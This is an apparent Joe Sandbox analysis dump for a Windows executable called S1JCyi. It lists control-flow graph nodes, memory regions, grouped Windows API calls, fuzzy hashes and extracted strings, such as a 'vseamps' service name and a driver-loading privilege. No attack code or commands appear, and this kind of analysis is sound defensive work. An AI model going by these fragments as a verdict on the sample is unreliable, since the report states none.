                                      control_flow_graph 196 7ffe1a4811b0-7ffe1a481207 197 7ffe1a48124b-7ffe1a48124e 196->197 198 7ffe1a481209-7ffe1a481222 call 7ffe1a491490 196->198 200 7ffe1a481254-7ffe1a481280 197->200 201 7ffe1a4814b8-7ffe1a4814bf 197->201 209 7ffe1a481224-7ffe1a481227 198->209 210 7ffe1a48123e 198->210 202 7ffe1a481282-7ffe1a48128f 200->202 203 7ffe1a4812f6-7ffe1a481335 call 7ffe1a481b90 call 7ffe1a490a50 200->203 204 7ffe1a4814c3-7ffe1a4814ea call 7ffe1a481b70 201->204 206 7ffe1a481295-7ffe1a48129c 202->206 207 7ffe1a4814f1-7ffe1a4814f6 call 7ffe1a481a40 202->207 230 7ffe1a481340-7ffe1a4813cb 203->230 212 7ffe1a48129e-7ffe1a4812a5 206->212 213 7ffe1a4812c7-7ffe1a4812cf call 7ffe1a481b90 206->213 221 7ffe1a4814f7-7ffe1a4814ff call 7ffe1a481110 207->221 215 7ffe1a481241-7ffe1a481246 209->215 216 7ffe1a481229-7ffe1a48123c call 7ffe1a491490 209->216 210->215 220 7ffe1a4812ab-7ffe1a4812b3 call 7ffe1a481b90 212->220 212->221 232 7ffe1a4812d2-7ffe1a4812f1 call 7ffe1a490e10 213->232 215->197 216->209 216->210 235 7ffe1a4814eb-7ffe1a4814f0 call 7ffe1a4879cc 220->235 236 7ffe1a4812b9-7ffe1a4812c5 220->236 230->230 234 7ffe1a4813d1-7ffe1a4813da 230->234 232->203 238 7ffe1a4813e0-7ffe1a481402 234->238 235->207 236->232 241 7ffe1a481404-7ffe1a48140e 238->241 242 7ffe1a481411-7ffe1a48142c 238->242 241->242 242->238 244 7ffe1a48142e-7ffe1a481436 242->244 245 7ffe1a481498-7ffe1a4814a6 244->245 246 7ffe1a481438-7ffe1a48143b 244->246 248 7ffe1a4814a8-7ffe1a4814b5 call 7ffe1a481bcc 245->248 249 7ffe1a4814b6 245->249 247 7ffe1a481440-7ffe1a481449 246->247 251 7ffe1a481455-7ffe1a481465 247->251 252 7ffe1a48144b-7ffe1a481453 247->252 248->249 249->204 254 7ffe1a481470-7ffe1a481496 251->254 255 7ffe1a481467-7ffe1a48146e 251->255 252->251 254->245 254->247 255->254
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 73155330-0
                                      • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                      • Instruction ID: f9d2057456027cd5ae8519ce74b865ca4af5f3050ff095a5e1a7c76e729fdaaa
                                      • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                      • Instruction Fuzzy Hash: 73814D22B19B8245E6118B7AA8401B5A694FF56FE4F148377EF5D637A2DF3CE0E18300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                      • String ID:
                                      • API String ID: 3526400053-0
                                      • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                      • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                      • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                      • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                      • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                      • API String ID: 3408796845-4213300970
                                      • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                      • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                      • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                      • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                      • String ID: ampStopSingletone: logging ended
                                      • API String ID: 2048888615-3533855269
                                      • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                      • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                      • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                      • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                      • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                      • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                      • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: ErrorLastManagerOpen$FileModuleName
                                      • String ID: /remove$/service$vseamps
                                      • API String ID: 67513587-3839141145
                                      • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                      • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                      • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                      • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                      APIs
                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                      • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                      • GetProcAddress.KERNEL32 ref: 000000014000F117
                                        • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: AddressProc$Load$Library
                                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                      • API String ID: 3981747205-232180764
                                      • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                      • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                      • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                      • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                      • String ID:
                                      • API String ID: 4284112124-0
                                      • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                      • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                      • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                      • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                      • String ID: vseamps
                                      • API String ID: 3693165506-3944098904
                                      • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                      • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                      • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                      • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: FileModuleName
                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                      • API String ID: 514040917-4022980321
                                      • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                      • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                      • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                      • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                      • String ID:
                                      • API String ID: 2057259594-0
                                      • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                      • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                      • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                      • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                      • String ID:
                                      • API String ID: 3103264659-0
                                      • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                      • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                      • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                      • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                      • String ID:
                                      • API String ID: 3140674995-0
                                      • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                      • Instruction ID: dd330f4c1039db13202c35dcdfff1ca58ae50c2581fcd400b819afb0be035acc
                                      • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                      • Instruction Fuzzy Hash: F8312A72709E818AEB709F61E8403F96361FB88B54F44407ADB4E57BA4EF38D668C710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 1269745586-0
                                      • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                      • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                      • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                      • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                      • String ID:
                                      • API String ID: 1239891234-0
                                      • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                      • Instruction ID: 0e7ca93b428b70adabd859f022e614be8b92b076a4b0e130870cd0db3a3b10ae
                                      • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                      • Instruction Fuzzy Hash: 82315336714F8186D760CB65E8402BE73A0FB88B64F5005B6EA9E43B65DF38D165C710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                      • String ID:
                                      • API String ID: 1445889803-0
                                      • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                      • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                      • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                      • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                      APIs
                                      • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                      • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID:
                                      • API String ID: 1617791916-0
                                      • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                      • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                      • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                      • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$CaptureContext
                                      • String ID:
                                      • API String ID: 2202868296-0
                                      • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                      • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                      • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                      • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise_clrfp
                                      • String ID:
                                      • API String ID: 15204871-0
                                      • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                      • Instruction ID: 24754fc55a76da6e6ab117fdf1a985223f29a66601a7c5a06a2d7f301839ea50
                                      • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                      • Instruction Fuzzy Hash: CDB12B73614B898BE725CF2AC44636C77A0F788F68F1589A6DA5E837B4CB39D461C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
